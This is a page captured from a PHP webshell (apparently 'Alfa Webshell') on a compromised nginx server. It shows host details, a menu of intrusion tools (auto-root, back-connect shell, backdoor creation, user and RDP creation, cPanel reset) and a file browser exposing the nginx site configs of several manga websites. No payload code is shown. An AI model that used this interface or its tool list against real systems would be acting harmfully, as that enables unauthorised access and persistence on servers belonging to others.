Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
nginx /
sites-enabled /
[ HOME SHELL ]
Name
Size
Permission
Action
berripix.com.conf
2.66
KB
-rw-rw-r--
mangaberri.com.conf
3.04
KB
-rw-rw-r--
mangacherri.com.conf
2.33
KB
-rw-rw-r--
mangalegend.com.conf
2.74
KB
-rw-r--r--
readmodulo.com.conf
2.77
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : berripix.com.conf
# Redirect HTTP to HTTPS server { listen 80; server_name berripix.com www.berripix.com; add_header X-Redirected-By "nginx 302 temporary" always; return 302 https://$host$request_uri; } server { listen 443 ssl http2; server_name berripix.com www.berripix.com; root /var/www/html/berripix/public_html; index index.php index.html; client_max_body_size 100M; ssl_certificate /etc/letsencrypt/live/berripix.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/berripix.com/privkey.pem; include /etc/letsencrypt/options-ssl-nginx.conf; ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; client_body_buffer_size 16k; if ($block_malware) { return 403; } error_log /var/log/nginx/berripix_error.log debug; # Serve PHP files in any subfolder (e.g. /bo/index.php) location ~ ^/[^/]+/.+\.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php8.3-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } # Allow static + PHP file fallback in any subfolder location ~ ^/[^/]+/ { try_files $uri $uri/ $uri.php?$query_string; } # Handle specific root-level short URLs location = /actions { try_files $uri $uri/ /actions.php?$query_string; } location = /search { try_files $uri $uri/ /search.php?$query_string; } location = /index { try_files $uri $uri/ /index.php?$query_string; } location = /terms_of_service { try_files $uri $uri/ /terms_of_service.php?$query_string; } # Root handler — try .php fallback before slug location / { try_files $uri $uri/ $uri.php @slug; } # Slug rewrite fallback (e.g. /vegeta → detail.php?title=vegeta) location @slug { rewrite ^/([^/]+)$ /detail.php?title=$1 last; } location ~* ^/mangas/.*\.(php|php[0-9]?|phtml|pht|phar|phps|cgi|pl|py|sh)$ { deny all; } # Global PHP handler for files like /index.php, /terms_and_conditions.php location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php8.3-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param HTTPS on; include fastcgi_params; } # Block hidden files (e.g. .git, .env) location ~ /\. { deny all; } # Cache static assets location ~* \.(?:jpg|jpeg|png|gif|webp|css|js)$ { expires 30d; add_header Cache-Control "public"; access_log off; } }
Close